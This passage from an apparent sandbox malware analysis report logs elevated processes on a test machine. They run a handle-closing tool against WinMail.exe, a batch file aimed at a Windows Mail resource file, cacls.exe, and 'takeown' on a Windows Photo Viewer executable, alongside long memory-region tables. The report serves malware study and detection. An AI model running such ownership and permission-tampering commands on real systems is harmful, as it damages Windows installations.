| private_0x0000000000180000 | 0x00180000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x00190000 | 0x0024dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000250000 | 0x00250000 | 0x0028ffff | Private Memory | rw |
|
|
|
- |
| imm32.dll | 0x00290000 | 0x002b9fff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000370000 | 0x00370000 | 0x0046ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000470000 | 0x00470000 | 0x005f7fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000000600000 | 0x00600000 | 0x00780fff | Pagefile Backed Memory | r |
|
|
|
- |
| sortdefault.nls | 0x00790000 | 0x00ac6fff | Memory Mapped File | r |
|
|
|
- |
| takeown.exe | 0x01220000 | 0x0122ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000001230000 | 0x01230000 | 0x0522ffff | Pagefile Backed Memory | - |
|
|
|
- |
| pagefile_0x0000000005230000 | 0x05230000 | 0x0662ffff | Pagefile Backed Memory | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| version.dll | 0x742f0000 | 0x742f7fff | Memory Mapped File | rwx |
|
|
|
- |
| ntmarta.dll | 0x743a0000 | 0x743c7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| shlwapi.dll | 0x74da0000 | 0x74de3fff | Memory Mapped File | rwx |
|
|
|
- |
| msctf.dll | 0x74df0000 | 0x74f0ffff | Memory Mapped File | rwx |
|
|
|
- |
| imm32.dll | 0x74f10000 | 0x74f3afff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| gdi32.dll | 0x75030000 | 0x7517cfff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| user32.dll | 0x76c70000 | 0x76daffff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| combase.dll | 0x77390000 | 0x77549fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ed20000 | 0x7ed20000 | 0x7ee1ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ee20000 | 0x7ee20000 | 0x7ee42fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ee46000 | 0x7ee46000 | 0x7ee48fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee49000 | 0x7ee49000 | 0x7ee49fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee4c000 | 0x7ee4c000 | 0x7ee4efff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ee4f000 | 0x7ee4f000 | 0x7ee4ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Process #227: cmd.exe
54
0
| Information | Value |
|---|---|
| ID | #227 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c qRY2vco2.exe -accepteula "WinMail.exe" -nobanner |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:41, Reason: Child Process |
| Unmonitor | End Time: 00:03:56, Reason: Self Terminated |
| Monitor Duration | 00:00:15 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xff8 |
| Parent PID | 0x770 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
DA0
0x
C8C
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000ed0000 | 0x00ed0000 | 0x04ecffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004ed0000 | 0x04ed0000 | 0x04eeffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004ed0000 | 0x04ed0000 | 0x04edffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004ee0000 | 0x04ee0000 | 0x04ee3fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04ef1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ef0000 | 0x04ef0000 | 0x04ef3fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004f00000 | 0x04f00000 | 0x04f13fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004f20000 | 0x04f20000 | 0x04f5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f60000 | 0x04f60000 | 0x0505ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000005060000 | 0x05060000 | 0x05063fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000005070000 | 0x05070000 | 0x05070fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000005080000 | 0x05080000 | 0x05081fff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x05090000 | 0x0514dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000005180000 | 0x05180000 | 0x0518ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x053fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005190000 | 0x05190000 | 0x051cffff | Private Memory | rw |
|
|
|
- |
| private_0x00000000051d0000 | 0x051d0000 | 0x052cffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005300000 | 0x05300000 | 0x053fffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005400000 | 0x05400000 | 0x0547ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05480000 | 0x057b6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ef60000 | 0x7ef60000 | 0x7f05ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007f060000 | 0x7f060000 | 0x7f082fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007f084000 | 0x7f084000 | 0x7f086fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f087000 | 0x7f087000 | 0x7f087fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f08a000 | 0x7f08a000 | 0x7f08afff | Private Memory | rw |
|
|
|
- |
| private_0x000000007f08d000 | 0x7f08d000 | 0x7f08ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (9)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | qRY2vco2.exe | type = file_attributes |
|
1 | |
| Open | STD_OUTPUT_HANDLE | - |
|
4 | |
| Open | STD_INPUT_HANDLE | - |
|
2 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 72, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\qRY2vco2.exe | os_pid = 0xf08, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (17)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
6 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
2 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
2 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 | |
| Set Environment String | name = =ExitCode, value = 00000001 |
|
1 | |
| Set Environment String | name = =ExitCodeAscii |
|
1 |
Process #228: cmd.exe
88
0
| Information | Value |
|---|---|
| ID | #228 |
| File Name | c:\windows\syswow64\cmd.exe |
| Command Line | C:\Windows\system32\cmd.exe /c ""C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" "C:\Program Files\Windows Mail\en-US\msoeres.dll.mui"" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:43, Reason: Child Process |
| Unmonitor | End Time: 00:04:02, Reason: Terminated by Timeout |
| Monitor Duration | 00:00:19 |
OS Process Information
| Information | Value |
|---|---|
| PID | 0x408 |
| Parent PID | 0xa70 (c:\users\ciihmnxmn6ps\desktop\mngrxc.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
F30
0x
808
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| cmd.exe | 0x003f0000 | 0x0043ffff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x0000000000a60000 | 0x00a60000 | 0x04a5ffff | Pagefile Backed Memory | - |
|
|
|
- |
| private_0x0000000004a60000 | 0x04a60000 | 0x04a7ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a60000 | 0x04a60000 | 0x04a6ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000004a70000 | 0x04a70000 | 0x04a73fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04a81fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004a80000 | 0x04a80000 | 0x04a83fff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004a90000 | 0x04a90000 | 0x04aa3fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004ab0000 | 0x04ab0000 | 0x04aeffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004af0000 | 0x04af0000 | 0x04beffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000004bf0000 | 0x04bf0000 | 0x04bf3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x0000000004c00000 | 0x04c00000 | 0x04c00fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000004c10000 | 0x04c10000 | 0x04c11fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c20000 | 0x04c20000 | 0x04c5ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004c60000 | 0x04c60000 | 0x04c6ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004ca0000 | 0x04ca0000 | 0x04caffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004cb0000 | 0x04cb0000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x04cb0000 | 0x04d6dfff | Memory Mapped File | r |
|
|
|
- |
| private_0x0000000004e10000 | 0x04e10000 | 0x04f0ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000004f10000 | 0x04f10000 | 0x0500ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000005010000 | 0x05010000 | 0x0518ffff | Private Memory | rw |
|
|
|
- |
| sortdefault.nls | 0x05190000 | 0x054c6fff | Memory Mapped File | r |
|
|
|
- |
| wow64cpu.dll | 0x5baa0000 | 0x5baa7fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64win.dll | 0x5bab0000 | 0x5bb22fff | Memory Mapped File | rwx |
|
|
|
- |
| wow64.dll | 0x5bb30000 | 0x5bb7efff | Memory Mapped File | rwx |
|
|
|
- |
| cmdext.dll | 0x741b0000 | 0x741b7fff | Memory Mapped File | rwx |
|
|
|
- |
| bcryptprimitives.dll | 0x74750000 | 0x747a8fff | Memory Mapped File | rwx |
|
|
|
- |
| cryptbase.dll | 0x747b0000 | 0x747b9fff | Memory Mapped File | rwx |
|
|
|
- |
| sspicli.dll | 0x747c0000 | 0x747ddfff | Memory Mapped File | rwx |
|
|
|
- |
| rpcrt4.dll | 0x74a00000 | 0x74aabfff | Memory Mapped File | rwx |
|
|
|
- |
| kernel32.dll | 0x74f40000 | 0x7502ffff | Memory Mapped File | rwx |
|
|
|
- |
| kernelbase.dll | 0x75190000 | 0x75305fff | Memory Mapped File | rwx |
|
|
|
- |
| msvcrt.dll | 0x76f20000 | 0x76fddfff | Memory Mapped File | rwx |
|
|
|
- |
| sechost.dll | 0x772b0000 | 0x772f2fff | Memory Mapped File | rwx |
|
|
|
- |
| advapi32.dll | 0x77550000 | 0x775cafff | Memory Mapped File | rwx |
|
|
|
- |
| ntdll.dll | 0x776b0000 | 0x77828fff | Memory Mapped File | rwx |
|
|
|
- |
| pagefile_0x000000007ee40000 | 0x7ee40000 | 0x7ef3ffff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x000000007ef40000 | 0x7ef40000 | 0x7ef62fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x000000007ef66000 | 0x7ef66000 | 0x7ef68fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef69000 | 0x7ef69000 | 0x7ef69fff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef6c000 | 0x7ef6c000 | 0x7ef6cfff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ef6d000 | 0x7ef6d000 | 0x7ef6ffff | Private Memory | rw |
|
|
|
- |
| private_0x000000007ffe0000 | 0x7ffe0000 | 0x7ffeffff | Private Memory | r |
|
|
|
- |
| private_0x000000007fff0000 | 0x7fff0000 | 0x7dfc57b4ffff | Private Memory | r |
|
|
|
- |
| pagefile_0x00007dfc57b50000 | 0x7dfc57b50000 | 0x7ffc57b4ffff | Pagefile Backed Memory | - |
|
|
|
- |
| ntdll.dll | 0x7ffc57b50000 | 0x7ffc57d11fff | Memory Mapped File | rwx |
|
|
|
- |
| private_0x00007ffc57d12000 | 0x7ffc57d12000 | 0x7ffffffeffff | Private Memory | r |
|
|
|
- |
Host Behavior
File (40)
| Operation | Filename | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat | desired_access = GENERIC_READ, file_attributes = FILE_ATTRIBUTE_NORMAL, share_mode = FILE_SHARE_READ, FILE_SHARE_WRITE |
|
1 | |
| Get Info | C:\Users\CIiHmnxMn6Ps\Desktop | type = file_attributes |
|
2 | |
| Get Info | "C:\Users\CIiHmnxMn6Ps\Desktop\g58aDsa9.bat" | type = file_attributes |
|
1 | |
| Get Info | - | type = file_type |
|
1 | |
| Get Info | STD_OUTPUT_HANDLE | type = file_type |
|
5 | |
| Open | STD_OUTPUT_HANDLE | - |
|
18 | |
| Open | STD_INPUT_HANDLE | - |
|
2 | |
| Open | - | - |
|
4 | |
| Read | - | size = 8191, size_out = 226 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 2 |
|
2 | |
| Write | STD_OUTPUT_HANDLE | size = 30 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 5 |
|
1 | |
| Write | STD_OUTPUT_HANDLE | size = 79 |
|
1 |
Registry (17)
| Operation | Key | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Open Key | HKEY_CURRENT_USER\Software\Policies\Microsoft\Windows\System | - |
|
1 | |
| Open Key | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | - |
|
1 | |
| Open Key | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | - |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 240, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 64, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_LOCAL_MACHINE\Software\Microsoft\Command Processor | value_name = AutoRun, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DisableUNCCheck, data = 64, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = EnableExtensions, data = 1, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DelayedExpansion, data = 1, type = REG_NONE |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = DefaultColor, data = 0, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = CompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = PathCompletionChar, data = 9, type = REG_DWORD_LITTLE_ENDIAN |
|
1 | |
| Read Value | HKEY_CURRENT_USER\Software\Microsoft\Command Processor | value_name = AutoRun, data = 9, type = REG_NONE |
|
1 |
Process (1)
| Operation | Process | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Create | C:\Windows\system32\cacls.exe | os_pid = 0xe20, creation_flags = CREATE_EXTENDED_STARTUPINFO_PRESENT, show_window = SW_SHOWNORMAL |
|
1 |
Module (8)
| Operation | Module | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|---|
| Get Handle | c:\windows\syswow64\cmd.exe | base_address = 0x3f0000 |
|
1 | |
| Get Handle | c:\windows\syswow64\kernel32.dll | base_address = 0x74f40000 |
|
2 | |
| Get Filename | - | process_name = c:\windows\syswow64\cmd.exe, file_name_orig = C:\Windows\SysWOW64\cmd.exe, size = 260 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetThreadUILanguage, address_out = 0x74f82780 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = CopyFileExW, address_out = 0x74f5fa80 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = IsDebuggerPresent, address_out = 0x74f5a790 |
|
1 | |
| Get Address | c:\windows\syswow64\kernel32.dll | function = SetConsoleInputExeNameW, address_out = 0x752a35c0 |
|
1 |
Environment (20)
| Operation | Additional Information | Success | Count | Logfile |
|---|---|---|---|---|
| Get Environment String | - |
|
5 | |
| Get Environment String | name = PATH, result_out = C:\ProgramData\Oracle\Java\javapath;C:\Windows\system32;C:\Windows;C:\Windows\System32\Wbem;C:\Windows\System32\WindowsPowerShell\v1.0\ |
|
3 | |
| Get Environment String | name = PATHEXT, result_out = .COM;.EXE;.BAT;.CMD;.VBS;.VBE;.JS;.JSE;.WSF;.WSH;.MSC |
|
4 | |
| Get Environment String | name = PROMPT |
|
1 | |
| Get Environment String | name = COMSPEC, result_out = C:\Windows\system32\cmd.exe |
|
1 | |
| Get Environment String | name = KEYS |
|
1 | |
| Get Environment String | name = USERNAME, result_out = CIiHmnxMn6Ps |
|
1 | |
| Get Environment String | name = PROMPT, result_out = $P$G |
|
1 | |
| Set Environment String | name = PROMPT, value = $P$G |
|
1 | |
| Set Environment String | name = =C:, value = C:\Users\CIiHmnxMn6Ps\Desktop |
|
1 | |
| Set Environment String | name = COPYCMD |
|
1 |
Process #229: takeown.exe
0
0
| Information | Value |
|---|---|
| ID | #229 |
| File Name | c:\windows\syswow64\takeown.exe |
| Command Line | takeown /F "C:\Program Files\Windows Photo Viewer\dir.exe" |
| Initial Working Directory | C:\Users\CIiHmnxMn6Ps\Desktop\ |
| Monitor | Start Time: 00:03:46, Reason: Child Process |
| Unmonitor | End Time: 00:03:54, Reason: Self Terminated |
| Monitor Duration | 00:00:08 |
| Remark | No high level activity detected in monitored regions |
OS Process Information
| Information | Value |
|---|---|
| PID | 0xfcc |
| Parent PID | 0x4b0 (c:\windows\syswow64\cmd.exe) |
| Is Created or Modified Executable |
|
| Integrity Level | High (Elevated) |
| Username | LHNIWSJ\CIiHmnxMn6Ps |
| Enabled Privileges | SeChangeNotifyPrivilege, SeImpersonatePrivilege, SeCreateGlobalPrivilege |
| Thread IDs |
0x
B60
0x
8A0
|
Region
| Name | Start VA | End VA | Type | Permissions | Monitored | Dumped | YARA | Actions |
|---|---|---|---|---|---|---|---|---|
| private_0x0000000000100000 | 0x00100000 | 0x0011ffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x0000000000100000 | 0x00100000 | 0x0010ffff | Pagefile Backed Memory | rw |
|
|
|
- |
| private_0x0000000000110000 | 0x00110000 | 0x00113fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000120000 | 0x00120000 | 0x00121fff | Private Memory | rw |
|
|
|
- |
| takeown.exe.mui | 0x00120000 | 0x00124fff | Memory Mapped File | r |
|
|
|
- |
| pagefile_0x0000000000130000 | 0x00130000 | 0x00143fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x0000000000150000 | 0x00150000 | 0x0018ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000190000 | 0x00190000 | 0x001cffff | Private Memory | rw |
|
|
|
- |
| pagefile_0x00000000001d0000 | 0x001d0000 | 0x001d3fff | Pagefile Backed Memory | r |
|
|
|
- |
| pagefile_0x00000000001e0000 | 0x001e0000 | 0x001e0fff | Pagefile Backed Memory | r |
|
|
|
- |
| private_0x00000000001f0000 | 0x001f0000 | 0x001f1fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000200000 | 0x00200000 | 0x0023ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000240000 | 0x00240000 | 0x0027ffff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000280000 | 0x00280000 | 0x00280fff | Private Memory | rw |
|
|
|
- |
| private_0x0000000000290000 | 0x00290000 | 0x00290fff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002a0000 | 0x002a0000 | 0x002affff | Private Memory | rw |
|
|
|
- |
| private_0x00000000002b0000 | 0x002b0000 | 0x004affff | Private Memory | rw |
|
|
|
- |
| locale.nls | 0x002b0000 | 0x0036dfff | Memory Mapped File | r |
|
|
|
- |
| imm32.dll | 0x00370000 | 0x00399fff | Memory Mapped File | r |
|
|
|
- |
